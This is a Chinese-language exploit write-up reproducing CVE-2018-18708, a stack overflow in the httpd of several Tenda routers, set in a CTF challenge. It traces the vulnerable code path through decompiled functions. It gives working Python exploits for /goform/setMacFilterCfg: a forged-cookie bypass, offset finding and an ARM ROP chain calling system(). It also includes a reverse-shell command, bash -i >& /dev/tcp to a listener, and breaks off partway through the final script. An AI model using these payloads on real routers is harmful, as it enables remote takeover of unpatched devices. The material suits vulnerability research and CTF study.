CVE-2018-18708 复现

该题在nu1lctf2020 的pwn中已经出现,为babyrouter,不妨来复现复现该cve。

工具+环境

下载

cutter

ida

gdb + pwndbg

qemu-arm

python

远程实验环境

docker + qemu-arm

漏洞分析

简要概述

CVE-2018-18708,多款Tenda产品中的httpd存在缓冲区溢出漏洞。攻击者可利用该漏洞造成拒绝服务(覆盖函数的返回地址)。以下产品和版本受到影响:Tenda AC7 V15.03.06.44_CN版本;AC9 V15.03.05.19(6318)_CN版本;AC10 V15.03.06.23_CN版本;AC15 V15.03.05.19_CN版本;AC18 V15.03.05.19(6318)_CN版本。

漏洞点

sub_BE73C

signed int __fastcall vul_end(const char *a1, char *a2) # offset 000BE73C
{
 signed int v2; // r3
 char *dest; // [sp+8h] [bp-3Ch]
 char *str; // [sp+Ch] [bp-38h]
 int v6; // [sp+10h] [bp-34h]
 int v7; // [sp+14h] [bp-30h]
 int v8; // [sp+18h] [bp-2Ch]
 int v9; // [sp+1Ch] [bp-28h]
 int s2; // [sp+20h] [bp-24h]
 int v11; // [sp+24h] [bp-20h]
 int v12; // [sp+28h] [bp-1Ch]
 int v13; // [sp+2Ch] [bp-18h]
 char v14; // [sp+32h] [bp-12h]
 char v15; // [sp+33h] [bp-11h]
 char *src; // [sp+34h] [bp-10h]

 str = (char *)a1;
 dest = a2;
 src = strchr(a1, 13); //检测deviceList内容是否包含’\r’,随后进入分支执行漏洞代码。
 if ( src )
 {
  *src++ = 0;
  v6 = 0;
  v7 = 0;
  v8 = 0;
  v9 = 0;
  if ( GetValue("cgi_debug", &v6) && !strcmp("on", (const char *)&v6) )
  {
   v15 = 1;
   printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "parse_macfilter_rule", 807, off_FCFE4[0]);
   printf("parase rule: name == %s, mac == %s\n\x1B[0m", str, src);
  }
  strcpy(dest + 32, str); // 漏洞点vul
  strcpy(dest, src); // 漏洞点
  v2 = 0;
 }
 else
 {
  s2 = 0;
  v11 = 0;
  v12 = 0;
  v13 = 0;
  if ( GetValue("cgi_debug", &s2) && !strcmp("on", (const char *)&s2) )
  {
   v14 = 2;
   printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "parse_macfilter_rule", 803, off_FCFE8[0]);
   printf("source_rule error: %s!\n\x1B[0m", str);
  }
  v2 = 2;
 }
 return v2;
}

从以上可以很容易看出漏洞点在strcpy函数, 那str是通过参数一传入的,进行逆向跟踪。

sub_BDA1C

int __fastcall sub_BDA1C(int a1, const char *vul_str, int a3)
{
 int v4; // [sp+Ch] [bp-1F0h]
 const char *v5; // [sp+10h] [bp-1ECh]
 int v6; // [sp+14h] [bp-1E8h]
 int v7; // [sp+1Ch] [bp-1E0h]
 int v8; // [sp+20h] [bp-1DCh]
 int v9; // [sp+24h] [bp-1D8h]
 int v10; // [sp+28h] [bp-1D4h]
 int v11; // [sp+2Ch] [bp-1D0h]
 int v12; // [sp+30h] [bp-1CCh]
 int v13; // [sp+34h] [bp-1C8h]
 int v14; // [sp+38h] [bp-1C4h]
 int s2; // [sp+3Ch] [bp-1C0h]
 int v16; // [sp+40h] [bp-1BCh]
 int v17; // [sp+44h] [bp-1B8h]
 int v18; // [sp+48h] [bp-1B4h]
 char v19; // [sp+4Ch] [bp-1B0h]
 char s; // [sp+CCh] [bp-130h]
 char v21; // [sp+14Ch] [bp-B0h]
 int v22; // [sp+16Ch] [bp-90h]
 char v23; // [sp+1EDh] [bp-Fh]
 char v24; // [sp+1EEh] [bp-Eh]
 char v25; // [sp+1EFh] [bp-Dh]

 v6 = a1;
 v5 = vul_str;
 v4 = a3;
 memset(&s, 0, 0x80u);
 memset(&v19, 0, 0x80u);
 s2 = 0;
 v16 = 0;
 v17 = 0;
 v18 = 0;
 if ( GetValue("cgi_debug", &s2) && !strcmp("on", (const char *)&s2) )
 {
  v25 = 1;
  printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_rules_by_one", 667, off_FCFE4[0]);
  printf("set macfilter rules by one, source_rule == %s, index == %d\n\x1B[0m", v5, v4);
 }
 memset(&v21, 0, 0xA0u);
 vul_end(v5, &v21); // 调用, v5为传入后strcpy的参数
 v11 = 0;
 v12 = 0;
 v13 = 0;
 v14 = 0;
 if ( GetValue("cgi_debug", &v11) && !strcmp("on", (const char *)&v11) )
 {
  v24 = 1;
  printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_rules_by_one", 671, off_FCFE4[0]);
  printf("get rule%d: name == %s, mac == %s\n\x1B[0m", v4, &v22, &v21);
 }
 snprintf(&s, 0x80u, "macfilter.%s.list%d", v6, v4);
 snprintf(&v19, 0x80u, "%s", &v21);
 v7 = 0;
 v8 = 0;
 v9 = 0;
 v10 = 0;
 if ( GetValue("cgi_debug", &v7) && !strcmp("on", (const char *)&v7) )
 {
  v23 = 1;
  printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_rules_by_one", 675, off_FCFE4[0]);
  printf("set rule: %s == %s\n\x1B[0m", &s, &v19);
 }
 SetValue(&s, &v19);
 if ( (_BYTE)v22 )
  sub_C2FD4((int)&v22, (int)&v21);
 return 0;
}

字符串也是该函是第二个参数进行传入的,继续逆跟踪。

sub_BD758

int __fastcall sub_BD758(int a1, char *vul_str)
{
 const char *s; // [sp+8h] [bp-44h]
 int v4; // [sp+Ch] [bp-40h]
 int v5; // [sp+14h] [bp-38h]
 int v6; // [sp+18h] [bp-34h]
 int v7; // [sp+1Ch] [bp-30h]
 int v8; // [sp+20h] [bp-2Ch]
 int s2; // [sp+24h] [bp-28h]
 int v10; // [sp+28h] [bp-24h]
 int v11; // [sp+2Ch] [bp-20h]
 int v12; // [sp+30h] [bp-1Ch]
 char v13; // [sp+36h] [bp-16h]
 char v14; // [sp+37h] [bp-15h]
 char *v15; // [sp+38h] [bp-14h]
 int v16; // [sp+3Ch] [bp-10h]

 v4 = a1;
 s = vul_str;
 v16 = 1;
 v15 = 0;
 s2 = 0;
 v10 = 0;
 v11 = 0;
 v12 = 0;
 if ( GetValue("cgi_debug", &s2) && !strcmp("on", (const char *)&s2) )
 {
  v14 = 1;
  printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_rules", 617, off_FCFE4[0]);
  printf("set macfilter rules\n\x1B[0m");
 }
 sub_BDE40(v4);
 if ( *s )
 {
  while ( 1 )
  {
   v15 = strchr(s, 10);
   if ( !v15 )
    break;
   *v15++ = 0;
   vul_2(v4, s, v16); // 调用vul函数, s为传入的字符串
   s = v15;
   ++v16;
  }
  vul_2(v4, s, v16); // 调用vul函数, s为传入的字符串
  sub_BE9DC(v4, v16);
 }
 else
 {
  v5 = 0;
  v6 = 0;
  v7 = 0;
  v8 = 0;
  if ( GetValue("cgi_debug", &v5) && !strcmp("on", (const char *)&v5) )
  {
   v13 = 1;
   printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_rules", 623, off_FCFE4[0]);
   printf("rule list is NULL!\n\x1B[0m");
  }
 }
 return 0;
}

字符串是该函数的二个参数进行传入的,继续逆跟踪。

formSetMacFilterCfg

int __fastcall formSetMacFilterCfg(int a1) // 000BCB9C
{
 int v1; // r0
 int v3; // [sp+14h] [bp-218h]
 int v4; // [sp+1Ch] [bp-210h]
 int v5; // [sp+20h] [bp-20Ch]
 int v6; // [sp+24h] [bp-208h]
 int v7; // [sp+28h] [bp-204h]
 int v8; // [sp+2Ch] [bp-200h]
 int v9; // [sp+30h] [bp-1FCh]
 int v10; // [sp+34h] [bp-1F8h]
 int v11; // [sp+38h] [bp-1F4h]
 int v12; // [sp+3Ch] [bp-1F0h]
 int v13; // [sp+40h] [bp-1ECh]
 int v14; // [sp+44h] [bp-1E8h]
 int v15; // [sp+48h] [bp-1E4h]
 int v16; // [sp+4Ch] [bp-1E0h]
 int v17; // [sp+50h] [bp-1DCh]
 int v18; // [sp+54h] [bp-1D8h]
 int v19; // [sp+58h] [bp-1D4h]
 int s2; // [sp+5Ch] [bp-1D0h]
 int v21; // [sp+60h] [bp-1CCh]
 int v22; // [sp+64h] [bp-1C8h]
 int v23; // [sp+68h] [bp-1C4h]
 char v24; // [sp+6Ch] [bp-1C0h]
 char s; // [sp+ECh] [bp-140h]
 int v26; // [sp+1ECh] [bp-40h]
 int v27; // [sp+1F0h] [bp-3Ch]
 int v28; // [sp+1F4h] [bp-38h]
 int v29; // [sp+1F8h] [bp-34h]
 int v30; // [sp+1FCh] [bp-30h]
 int v31; // [sp+200h] [bp-2Ch]
 int v32; // [sp+204h] [bp-28h]
 int v33; // [sp+208h] [bp-24h]
 char v34; // [sp+20Fh] [bp-1Dh]
 char v35; // [sp+210h] [bp-1Ch]
 char v36; // [sp+211h] [bp-1Bh]
 char v37; // [sp+212h] [bp-1Ah]
 char v38; // [sp+213h] [bp-19h]
 char *vul_str; // [sp+214h] [bp-18h]
 void *v40; // [sp+218h] [bp-14h]
 int v41; // [sp+21Ch] [bp-10h]

 v3 = a1;
 v40 = 0;
 vul_str = 0;
 v41 = 0;
 v26 = 0;
 v27 = 0;
 v28 = 0;
 v29 = 0;
 v30 = 0;
 v31 = 0;
 v32 = 0;
 v33 = 0;
 memset(&s, 0, 0x100u);
 memset(&v24, 0, 0x80u);
 v40 = sub_2B794(v3, (int)"macFilterType", (int)&unk_F0BA4);
 v41 = sub_BD34C(v40); // 调用判断函数
 if ( v41 ) // 判断v41
 {
  s2 = 0;
  v21 = 0;
  v22 = 0;
  v23 = 0;
  if ( GetValue("cgi_debug", &s2) && !strcmp("on", (const char *)&s2) )
  {
   v38 = 2;
   printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "formSetMacFilterCfg", 500, off_FCFE8[0]);
   printf("set mac filter mode error!\n\x1B[0m");
  }
 }
 else
 {
  vul_str = (char *)sub_2B794(v3, (int)"deviceList", (int)&unk_F0BA4);
  v41 = vul_3((int)v40, vul_str);       // 漏洞调用点
  if ( v41 )
  {
   v16 = 0;
   v17 = 0;
   v18 = 0;
   v19 = 0;
   if ( GetValue("cgi_debug", &v16) && !strcmp("on", (const char *)&v16) )
   {
    v37 = 2;
    printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "formSetMacFilterCfg", 508, off_FCFE8[0]);
    printf("set mac filter rules error!\n\x1B[0m");
   }
  }
  else
  {
   sub_C3E80();
   v1 = sub_BED1C(v40);
   if ( CommitCfm(v1) )
   {
    send_msg_to_netctrl(9, "op=5");
    GetValue("wl2g.public.enable", &v26);
    if ( !strcmp("1", (const char *)&v26) )
    {
     v8 = 0;
     v9 = 0;
     v10 = 0;
     v11 = 0;
     if ( GetValue("cgi_debug", &v8) && !strcmp("on", (const char *)&v8) )
     {
      v35 = 1;
      printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "formSetMacFilterCfg", 528, off_FCFE4[0]);
      printf("2.4G is enabled, sending msg to 2.4G wifi refresh!\n\x1B[0m");
     }
     snprintf(&v24, 0x80u, "op=%d,wl_rate=%d", 11, 24);
     send_msg_to_netctrl(19, &v24);
    }
    GetValue("wl5g.public.enable", &v26);
    if ( !strcmp("1", (const char *)&v26) )
    {
     v4 = 0;
     v5 = 0;
     v6 = 0;
     v7 = 0;
     if ( GetValue("cgi_debug", &v4) && !strcmp("on", (const char *)&v4) )
     {
      v34 = 1;
      printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "formSetMacFilterCfg", 535, off_FCFE4[0]);
      printf("5G is enabled, sending msg to 5G wifi refresh!\n\x1B[0m");
     }
     snprintf(&v24, 0x80u, "op=%d,wl_rate=%d", 11, 5);
     send_msg_to_netctrl(19, &v24);
    }
   }
   else
   {
    v12 = 0;
    v13 = 0;
    v14 = 0;
    v15 = 0;
    if ( GetValue("cgi_debug", &v12) && !strcmp("on", (const char *)&v12) )
    {
     v36 = 2;
     printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "formSetMacFilterCfg", 519, off_FCFE8[0]);
     printf("cfm commit error!\n\x1B[0m");
    }
    v41 = 1;
   }
  }
 }
 snprintf(&s, 0x100u, "{\"errCode\":%d}", v41);
 return sub_9C66C(v3, &s);
}

进入目标分支后,再从deviceList获取传入v39变量,根据上一节的分析该值将被用作strcpy的参数。

然而这里有个判断,要想执行到前面我们所跟踪到的内容,必须先绕过一个if判断,也就是我们必须要得使v41这个变量值为0,然而该值是调用sub_BD34C函数的一个返回值,咱们先跟进sub_BD34C函数看看。

sub_BD34C

signed int __fastcall sub_BD34C(char *a1)
{
 signed int v1; // r3
 char *v3; // [sp+Ch] [bp-48h]
 int v4; // [sp+10h] [bp-44h]
 int v5; // [sp+14h] [bp-40h]
 int v6; // [sp+18h] [bp-3Ch]
 int v7; // [sp+1Ch] [bp-38h]
 int v8; // [sp+20h] [bp-34h]
 int v9; // [sp+24h] [bp-30h]
 int v10; // [sp+28h] [bp-2Ch]
 int v11; // [sp+2Ch] [bp-28h]
 int s2; // [sp+30h] [bp-24h]
 int v13; // [sp+34h] [bp-20h]
 int v14; // [sp+38h] [bp-1Ch]
 int v15; // [sp+3Ch] [bp-18h]
 char v16; // [sp+41h] [bp-13h]
 char v17; // [sp+42h] [bp-12h]
 char v18; // [sp+43h] [bp-11h]
 const char *v19; // [sp+44h] [bp-10h]

 v3 = a1;
 v19 = 0;
 s2 = 0;
 v13 = 0;
 v14 = 0;
 v15 = 0;
 if ( GetValue("cgi_debug", &s2) && !strcmp("on", (const char *)&s2) )
 {
  v18 = 1;
  printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_mode", 566, off_FCFE4[0]);
  printf("get mac filter mode == %s\n\x1B[0m", v3);
 }
 if ( *v3 )
 {
  if ( !strcmp("black", v3) || !strcmp("white", v3) ) // 参数字符串判断
  {
   SetValue("macfilter.mode", v3);
   if ( !strcmp("black", v3) )
    v19 = "deny";
   else
    v19 = "allow";
   SetValue("wl2g.ssid0.macmode", v19);
   SetValue("wl5g.ssid0.macmode", v19);
   v1 = 0; //设置返回值为0
  }
  else
  {
   v4 = 0;
   v5 = 0;
   v6 = 0;
   v7 = 0;
   if ( GetValue("cgi_debug", &v4) && !strcmp("on", (const char *)&v4) )
   {
    v16 = 2;
    printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_mode", 575, off_FCFE8[0]);
    printf("got wrong mac filter mode: %s!\n\x1B[0m", v3);
   }
   v1 = 2;
  }
 }
 else
 {
  v8 = 0;
  v9 = 0;
  v10 = 0;
  v11 = 0;
  if ( GetValue("cgi_debug", &v8) && !strcmp("on", (const char *)&v8) )
  {
   v17 = 2;
   printf("%s[%s:%s:%d] %s", off_FCFEC[0], "cgi", "set_macfilter_mode", 569, off_FCFE8[0]);
   printf("got mac filter mode failed!\n\x1B[0m");
  }
  v1 = 2;
 }
 return v1;
}

以上逻辑是,根据传入的参数来进行字符串判断,若传入参数字符串为black或者white就会使返回值为0,那么就可以执行到漏洞点。

然而sub_2B794函数是解析字符串返回对应的字符串,类似与json解析,根据key值找value。

sub_2B794

void *__fastcall sub_2B794(int a1, int a2, int a3)
{
 int v5; // [sp+4h] [bp-20h]
 _DWORD *v6; // [sp+14h] [bp-10h]

 v5 = a3;
 v6 = sub_1F8FC(*(_DWORD *)(a1 + 32), (char *)a2);
 if ( !v6 )
  return (void *)v5;
 if ( (*((unsigned __int16 *)v6 + 10) << 16) | *((unsigned __int16 *)v6 + 9) )
  return (void *)((*((unsigned __int16 *)v6 + 10) << 16) | *((unsigned __int16 *)v6 + 9));
 return &unk_D8440;
}

那么什么函数会调用formSetMacFilterCfg函数呢?继续跟踪调用函数。

sub_41F18

 int sub_41F18() 
 {
 ...
 sub_16EF4("AdvSetNat", formNatSet);
 sub_FE28("NatSet", aspNatSet);
 sub_16EF4("getMacFilterCfg", formGetMacFilterCfg);
 sub_16EF4("setMacFilterCfg", formSetMacFilterCfg);
 sub_16EF4("parentControlEn", formSetParentControlEnable);
 ...
 }

好像没发现啥,继续往上跟踪

sub_2E6F4

signed int sub_2E6F4()
{
 int v0; // r0
 size_t v1; // r3
 size_t v2; // r3
 signed int v3; // r3
 char s; // [sp+8h] [bp-194h]
 char dest; // [sp+88h] [bp-114h]
 char v7; // [sp+108h] [bp-94h]
 struct in_addr inp; // [sp+188h] [bp-14h]
 char *v9; // [sp+18Ch] [bp-10h]

 v9 = 0;
 memset(&s, 0, 0x80u);
 v0 = doSystemCmd("echo 0 > /proc/sys/net/ipv4/tcp_timestamps");
 sub_1B3DC(v0);
 inet_aton((const char *)&g_lan_ip, &inp);
 strcpy(&dest, off_FB76C);
 sub_12238(&dest);
 v9 = inet_ntoa(inp);
 if ( strlen(v9) + 1 > 0x7F )
  v1 = 128;
 else
  v1 = strlen(v9) + 1;
 sub_19354(&s, v9, v1);
 sub_2CF20(&s);
 if ( strlen(&v7) + 1 > 0x7F )
  v2 = 128;
 else
  v2 = strlen(&v7) + 1;
 sub_19354(&s, &v7, v2);
 sub_2CE84(&s);
 sub_121D0("main.html");
 sub_1F268(off_FB770);
 if ( sub_29218(port, retries) >= 0 )
 {
  sub_176B0(&unk_D8894, 0, 0, R7WebsSecurityHandler, 1);
  sub_176B0("/goform", 0, 0, websFormHandler, 0);
  sub_176B0("/cgi-bin", 0, 0, webs_Tenda_CGI_BIN_Handler, 0);
  sub_176B0(&unk_D8894, 0, 0, websDefaultHandler, 2);
  sub_41F18(); // call vul hunc
  sub_176B0("/", 0, 0, sub_2E9D8, 0);
  v3 = 0;
 }
 else
 {
  printf("%s %d: websOpenServer failed\n", "initWebs", 499);
  v3 = -1;
 }
 return v3;
}

通过gdb下断点确定访问“/goform/setMacFilterCfg”时会进入formSetMacfiltercfg函数。

再继续网上跟踪就是必须运行的代码块了,如下。

sub_2E128

signed int __fastcall sub_2E128(int a1, int a2)
{
 ...
 init_core_dump(v2);
 v3 = puts("\n\nYes:\n\n   ****** WeLoveLinux****** \n\n Welcome to ...");
 sub_305FC(v3);
 v4 = sleep(1u);
 v5 = ConnectCfm(v4);
 sub_100D8(0, 61440, 1, v5);
 memset(&s, 0, 0x80u);
 if ( !GetValue("lan.webiplansslen", &s) )
  strcpy(&s, "0");
 sslenable = atoi(&s);
 if ( !GetValue("lan.webport", &s) )
  strcpy(&s, "80");
 if ( !GetValue("lan.webipen", &dest) )
  strcpy(&dest, "0");
 if ( !strcmp((const char *)&dest, "1") )
 {
  sslport = atoi(&s);
  port = atoi(&s);
 }
 v6 = getLanIfName();
 if ( getIfIp(v6, &v21) < 0 )
 {
  GetValue("lan.ip", &s);
  strcpy(g_lan_ip, &s);
  memset(&v17, 0, 0x50u);
  if ( !tpi_lan_dhcpc_get_ipinfo_and_status(&v17) && v17 )
   vos_strcpy(g_lan_ip, &v17);
 }
 else
 {
  vos_strcpy(g_lan_ip, &v21);
 }
 memset(&v19, 0, 9u);
 v7 = inet_addr(g_lan_ip);
 v19 = (unsigned __int8)v19 | (v7 << 8);
 v20 = HIBYTE(v7);
 tpi_talk_to_kernel(5, &v19, &v18, 0, 0, 0, v15, v16);
 sub_2EA60(1);
 sub_2EA60(0);
 getpid();
 doSystemCmd("echo %d > %s");
 if ( sub_2E6F4() >= 0 ) // call our func
 {
  memset(&loginUserInfo, 0, 0x6Cu);
  signal(15, (__sighandler_t)sub_2DEC0);
  signal(9, (__sighandler_t)sub_2DEC0);
  signal(14, (__sighandler_t)sub_2DF48);
  alarm(0x3Cu);
  v35 = 0;
  mallopt(-1, 0);
  mallopt(-3, 2048);
  v9 = getpid();
  v34 = v9;
  while ( !dword_FD1C0 )
  {
   v10 = sub_1BFF4(-1, 1000);
   if ( v10 > 0 )
    v10 = sub_1C4F0(-1);
   v11 = sub_11570(v10);
   v9 = sub_2DD68(v11);
   if ( !(++v35 % 100) )
    v9 = malloc_trim(0);
  }
  if ( sslenable )
  {
   v12 = sub_1EF9C(v9);
  }
  else
  {
   v13 = sub_2940C(v9);
   v12 = sub_1B47C(v13);
  }
  sub_10258(v12);
  v8 = 0;
 }
 else
 {
  puts("main -> initWebs failed");
  v8 = -1;
 }
 return v8;
}

触发链

sub_2E128 -> sub_2E6F4 ->sub_41F18 -> formSetMacFilterCfg -> sub_BD758 -> sub_BDA1C -> sub_BE73C

那么现在我们就可以访问“/goform/setMacFilterCfg”时会进入formSetMacfiltercfg函数,传入类似与json的数据进行解析,则会将value值传入漏洞触发点。

payload

post 数据, rur = ‘/goform/setMacFilterCfg’

{"macFilterType": "white", "deviceList": payload}

漏洞调试

准备

编写qemu-arm启动脚本

#!/bin/sh
brctl addbr br0
ifconfig br0 10.10.10.10 up
qemu-arm-static -g 1234 -L ./pwn ./pwn/httpd

启动log

┌[logan☮arch]-(~/share/nu1l/babyroute/docker)
└> sudo ./start.sh 
[sudo] password for logan: 
init_core_dump 1816: rlim_cur = -1, rlim_max = -1
init_core_dump 1825: open core dump success
init_core_dump 1834: rlim_cur = 5242880, rlim_max = 5242880

Yes:

   ****** WeLoveLinux****** 

 Welcome to ...
connect: No such file or directory
Connect to server failed.
connect: No such file or directory
Connect to server failed.
connect: No such file or directory
Connect to server failed.
connect: No such file or directory
Connect to server failed.
create socket fail -1
connect: No such file or directory
Connect to server failed.
connect: No such file or directory
Connect to server failed.
connect: No such file or directory
Connect to server failed.
connect: No such file or directory
Connect to server failed.
[httpd][debug]----------------------------webs.c,157
httpd listen ip = 10.10.10.10 port = 80
webs: Listening for HTTP requests at address 10.10.10.10

启动后gdb远程调试

gdb-multiarch

设置 架构为arm

远程调试端口为1234

pwndbg> set architecture arm
The target architecture is set to "arm".
pwndbg> target remote 127.0.0.1:1234
Remote debugging using 127.0.0.1:1234

在漏洞函数0xC2FD4处下短点

pwndbg> b *0xC2FD4
Breakpoint 1 at 0xc2fd4

exp

#! /usr/bin/python3
import requests

url = "http://10.10.10.10/goform/setMacFilterCfg"
p = 'A' * 0x1000
d = {"macFilterType": "white", "deviceList": '\r'+ 'A' * 0x1000}
r = requests.post(url, d)
print(r.text)

log输出如下

┌[logan☮arch]-(~/share/nu1l/babyroute)
└> python poc
{"errCode":2}

发现不能运行到我们的位置,进行再调试调试看看是那块没有绕过。重新下断电在formSetMacFilterCfg函数,偏移为: 000BCB9C

发现能够调用到formSetMacFilterCfg函数,但没法继续调用下一个函数,再来分析分析还有什么条件没有绕过。

  0xbd3a0  sub  r3, fp, #0x24
  0xbd3a4  ldr  r2, [pc, #0x36c]
  0xbd3a8  add  r2, r4, r2
  0xbd3ac  mov  r0, r2
  0xbd3b0  mov  r1, r3
 ► 0xbd3b4  bl   #0xf2f8 <0xf2f8>

  0xbd3b8  mov  r3, r0
  0xbd3bc  cmp  r3, #0
  0xbd3c0  beq  #0xbd458 <0xbd458>

执行到GetValue的时候, 会出现http响应错误,然而该函数是调用lib的,只能先分析一下lib。

通过分析lib中的GetValue函数,会议cookie值检测,需要包含password等字段,内容随便伪造。

poc如下

触发poc

#! /usr/bin/python3
import requests

url = "http://10.10.10.10/goform/setMacFilterCfg"
c = {"Cookie":"password=0"}
p = 'A' * 0x1000
d = {"macFilterType": "black", "deviceList": '\r'+ 'A' * 0x1000}
r = requests.post(url, cookies = c, data = d)
print(r.text)

漏洞触发如下

*R0  0x0
*R1  0x3ffef110 ◂— 0
*R2  0x3ff4c020 ◂— stm  r0!, {r5}
*R3  0x0
*R4  0x41414141 ('AAAA')
 R5  0x11bf40 ◂— str  r7, [r5, #0x70] /* 0x666f672f; '/goform/setMacFilterCfg' */
 R6  0x1
 R7  0x408007fb ◂— 0x41414141 ('AAAA')
 R8  0xe968 ◂— stm  r0!, {r0, r2, r3}
 R9  0x2e128 ◂— ldr  r0, [pc, #0x40]
 R10 0x40800668 ◂— 0x41414141 ('AAAA')
*R11 0x41414141 ('AAAA')
*R12 0x3ff47edc —▸ 0x3ff3da50 ◂— adds  r0, #0
*SP  0x40800098 ◂— 0x41414141 ('AAAA')
*PC  0x41414140 ('@AAA')
───────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────
Invalid address 0x41414140

这时发现,已经修改了PC寄存器,实现了劫持。

漏洞利用

接下来就计算便宜找system函数了。

─────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────
 R0  0x407fffe4 ◂— 0x0
 R1  0x11ee31 ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC'
 R2  0x407fffe4 ◂— 0x0
 R3  0x11ee31 ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC'
 R4  0xfab18 —▸ 0xfa9d0 ◂— 1
 R5  0x11c0e0 ◂— strbtvs r6, [pc], -pc, lsr #14 /* 0x666f672f; '/goform/setMacFilterCfg' */
 R6  0x1
 R7  0x408007fb ◂— './pwn/httpd'
 R8  0xe968 ◂— mov  ip, sp
 R9  0x2e128 ◂— push  {r4, fp, lr}
 R10 0x40800668 ◂— 0x0
 R11 0x407ffe94 —▸ 0xbdb80 ◂— sub  r3, fp, #0x1d0
 R12 0xfaf60 —▸ 0x3fdda508 ◂— mov  r3, r0
 SP  0x407ffe50 ◂— 0x0
*PC  0xbe9a4 ◂— bl   #0xf640
──────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────
  0xbe990  bl   #0xf640 <0xf640>

  0xbe994  ldr  r2, [fp, #-0x3c]
  0xbe998  ldr  r3, [fp, #-0x10]
  0xbe99c  mov  r0, r2
  0xbe9a0  mov  r1, r3
 ► 0xbe9a4  bl   #0xf640 <0xf640>
65:0194│ r0  0x407fffe4 ◂— 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC'
... ↓
74:01d0│    0x40800020 ◂— 'BBBBCCCC'
75:01d4│    0x40800024 ◂— 'CCCC'
76:01d8│ r3-1 0x40800028 ◂— 0x0
... ↓
8d:0234│    0x40800084 ◂— 0x1f
8e:0238│    0x40800088 —▸ 0xf0bc8 ◂— ldmdbvs r6!, {r2, r5, r6, r8, sl, sp, lr} ^ /* 'deviceList' */

堆栈数据如上,由于是如下进行弹堆栈的,需要再填充(0x238 - 0x1d4)个字节才可以修爱pc寄存器,实现劫持。

.text:000BE9AC         MOV       R0, R3
.text:000BE9B0         SUB       SP, R11, #8
.text:000BE9B4         LDMFD      SP!, {R4,R11,PC}

重新修改poc

#! /usr/bin/python3
import requests

url = "http://10.10.10.10/goform/setMacFilterCfg"
c = {"Cookie":"password=0"}
p = 'A' * 0xA8
p += 'DDDD'
p += 'EEEE'
p += 'FFFF'

d = {"macFilterType": "black", "deviceList": '\r'+ p}
r = requests.post(url, cookies = c, data = d)

运行如下,那么就可以知道在哪可以实现修改pc寄存器了。

*R11 0x45454545 ('EEEE')
*R12 0x3ff47edc —▸ 0x3ff3da50 ◂— mov  r3, r0
*SP  0x40800098 ◂— 'GGGGHHHH'
*PC  0x46464646 ('FFFF')
──────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────
Invalid address 0x46464646

由于程序没有开启alsr与pie那么glibc中的基址是固定的。

直接算获取system地址。vmmap获取glibc基址为0xf659b000

在libc中找到system函数偏移

┌[logan☮arch]-(~/share/nu1l/babyroute)
└> readelf -s docker/pwn/lib/libc.so.0 | grep system
  433: 0005a270  348 FUNC  WEAK  DEFAULT  7 system
  904: 00047b38  80 FUNC  GLOBAL DEFAULT  7 svcerr_systemerr
 1394: 0005a270  348 FUNC  GLOBAL DEFAULT  7 __libc_syste

这里记得检查下CPSR寄存器的T位,因为栈上内容弹出到PC寄存器时,其最低有效位(LSB)将被写入CPSR寄存器的T位,而PC本身的LSB被设置为0。如果T位值为1,需要在地址上加一还原。

pwndbg> p/t $cpsr
$1 = 1100000000000000000000000010000
pwndbg> cyclic -l taab
176

寻找gadgets

gadget1

用于修改r3寄存器

┌[logan☮arch]-(~/share/nu1l/babyroute)
└> ROPgadget --binary docker/pwn/lib/libc.so.0 --only "pop" | grep r3
...
0x00018298 : pop {r3, pc}
...

gadget2

┌[logan☮arch]-(~/share/nu1l/babyroute)
└> ROPgadget --binary ./docker/pwn/lib/libc.so.0 | grep "mov r0, sp ; blx r3"
...
0x00040cb8 : mov r0, sp ; blx r3
...

payload结构为[offset, gadget1, system_addr, gadget2, cmd]

先将system函数地址储存在r3寄存器中,执行到gadget2将sp的值赋给r0,也就是将sp作为system的参数,而这时sp指向的是cmd。

poc

#! /usr/bin/python3
import requests
from pwn import *

url = "http://10.10.10.10/goform/setMacFilterCfg"
c = {"Cookie":"password=0"}
libc_base = 0xf659b000
system = libc_base + 0x0005a270
gadget1 = libc_base + 0x00018298
gadget2 = libc_base + 0x00040cb8
cmd = b'touch test\x00'

p = b'A' * 0xA8
p += b'DDDD'
p += b'EEEE'
p += p32(gadget1)
p += p32(system)
p += p32(gadget2)
p += cmd

d = {"macFilterType": "black", "deviceList": '\r'+ p}
r = requests.post(url, cookies = c, data = d)

print(r.text)

修改url 为docker所转发的端口,现在试试在docker上是否已经创建test文件

root@a52d03d064d3:/# ls
bin  dev flag lib  media opt  pwn  run  srv    sys  tmp var
boot etc home lib64 mnt  proc root sbin start.sh test usr

可以看到已经创建了test文件。

那么如何实现交互呢?就采用bash下来反弹sehll 吧。

先在自己的服务器上使用nc来监听。

nc -lvnp 4444

在poc中的命令填写为

bash -i >& /dev/tcp/192.168.43.13/4444 0>&1

192.168.43.13是我物理机的ip,4444是我nc监听的端口。

现在poc为

#! /usr/bin/python3
import requests
from pwn import *

url = "http://127.0.0.1:2333/goform/setMacFilterCfg"
c = {"Cookie":"password=0"}
libc_base = 0xf659b000
